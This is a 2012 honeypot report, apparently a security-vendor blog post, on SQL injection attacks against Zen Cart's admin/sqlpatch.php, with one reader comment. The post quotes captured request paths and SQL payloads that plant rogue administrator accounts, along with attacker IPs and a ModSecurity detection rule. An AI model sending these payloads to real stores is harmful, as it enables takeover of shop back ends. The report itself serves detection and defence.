Our web honeypot sensors picked up attacks aimed at exploiting a Zen Cart SQL Injection vulnerability.
The attacks send a POST request to the following URLs:
POST /admin/sqlpatch.php/password_forgotten.php?action=execute
POST /black_market/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /cart/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /product_info.php/products_id/1658/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /shop/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /shopping/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /store/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /tienda/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /tradeshow/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /zencart/admin/sqlpatch.php/password_forgotten.php?action=execute
The attacks include a POST payload parameter called "query_string" that included the following different payloads:
insert into `admin` ( `admin_id`, `admin_name`, `admin_email`, `admin_pass`, `admin_level` ) values ( '2112', 'jembot', 'adm.net', 'abc22a464d79887aeb11486b74081fb5:3d', '0' );'
insert into admin (admin_id, admin_name, admin_email, admin_pass) values (666, 'nobody', 'crew.tools43@yahoo.com', '21232f297a57a5a743894a0e4a801fc3:be');'
insert into admin values (12, 'sales', 'admin@localhost', '351683ea4e19efe34874b501fdbf9792:9b', 1);'
show tables;'
update admin set admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' where admin_id='1';'
As you can see, the attacker(s) are attempting to add in new user account data to the "admin" group within the back-end Zen Cart DB.
There were a total of 116 attack requests detected from 4 source IP addresses:
125.165.165.31
173.230.128.50
193.107.86.145
209.239.114.225
These attacks are identified by the following ModSecurity rule from our SpiderLabs Commercial Rules Feed which identifies SQL Injection attacks against this Zen Cart vulnerability:
#
# (2055343) ModSecurity Rules from Trustwave SpiderLabs: Zen Cart admin/sqlpatch.php query_string Parameter SQL Injection
#
SecRule REQUEST_LINE "@contains admin/sqlpatch.php" "chain,phase:2,block,rev:'031312',t:none,t:urlDecodeUni,capture,logdata:'%{args.query_string}',severity:'2',id:2055343
,msg:'SLR: Zen Cart admin/sqlpatch.php query_string Parameter SQL Injection',tag:'WEB_ATTACK/SQL_INJECTION',tag:'http://osvdb.org/show/osvdb/55343'"
SecRule "ARGS:query_string" "@pm # \" /* */ ` ' ( ) ; --" "ctl:auditLogParts=+E"
First off, Ryan, thank you so much for your excellent work over the years.
Three of the four source IP's you listed belong to companies that typically are responsive to abuse reports per our own experience -- http://www.dynamicnet.net/2011/08/security-snitching/
PT. TELKOM INDONESIA -- 125.165.165.31 -- tends to be hit and miss for being responsive.
Do you or any member of your team file abuse reports when you track such attacks?
Thank you.
Posted by: Dynamicnet | 15 March 2012 at 07:51